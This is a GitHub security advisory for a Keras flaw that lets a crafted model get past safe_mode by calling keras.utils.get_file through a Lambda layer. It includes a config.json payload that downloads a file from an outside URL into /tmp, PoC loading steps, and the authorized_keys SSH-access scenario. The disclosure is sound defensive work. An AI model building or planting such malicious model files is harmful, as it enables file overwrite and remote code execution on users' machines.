Skip to content

Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality

High severity GitHub Reviewed Published Aug 11, 2025 in keras-team/keras • Updated Aug 12, 2025

Package

pip keras (pip)

Affected versions

>= 3.0.0, < 3.11.0

Patched versions

3.11.0

Description

Summary

It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.

The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).

Impact

Type Vector Impact
Unsafe deserialization Client-Side (when loading untrusted model) Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases.

Details

Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the “lambda” class name.
https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -

if config["class_name"] == "__lambda__":
        if safe_mode:
            raise ValueError(
                "Requested the deserialization of a `lambda` object. "
                "This carries a potential risk of arbitrary code execution "
                "and thus it is disallowed by default. If you trust the "
                "source of the saved model, you can pass `safe_mode=False` to "
                "the loading function in order to allow `lambda` loading, "
                "or call `keras.config.enable_unsafe_deserialization()`."
            )

A fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.

package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:

However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file, and download remote files to an attacker-controlled location.
This allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine.
Since the model does not contain arbitrary Python code, this scenario will not be blocked by “safe_mode”. It will bypass the latest fix since it uses a function from one of the approved modules (keras).

Example

The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by sending arbitrary arguments to Keras’ builtin function keras.utils.get_file() -

           {
                "class_name": "Lambda",
                "config": {
                    "arguments": {
                        "origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js",
                        "cache_dir":"/tmp",
                        "cache_subdir":"",
                        "force_download": true},
                    "function": {
                        "class_name": "function",
                        "config": "get_file",
                        "module": "keras.utils"
                    }
                },

PoC

  1. Download malicious_model_download.keras to a local directory

  2. Load the model -

from keras.models import load_model
model = load_model("malicious_model_download.keras", safe_mode=True)
  1. Observe that a new file index.js was created in the /tmp directory

Fix suggestions

  1. Add an additional flag block_all_lambda that allows users to completely disallow loading models with a Lambda layer.
  2. Audit the keras, keras_hub, keras_cv, keras_nlp modules and remove/block all “gadget functions” which could be used by malicious ML models.
  3. Add an additional flag lambda_whitelist_functions that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer

Credit

The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research

References

@hertschuh hertschuh published to keras-team/keras Aug 11, 2025
Published to the GitHub Advisory Database Aug 12, 2025
Reviewed Aug 12, 2025
Last updated Aug 12, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(0th percentile)

Weaknesses

Deserialization of Untrusted Data

The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid. Learn more on MITRE.

CVE ID

CVE-2025-8747

GHSA ID

GHSA-c9rc-mg46-23w3

Source code

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.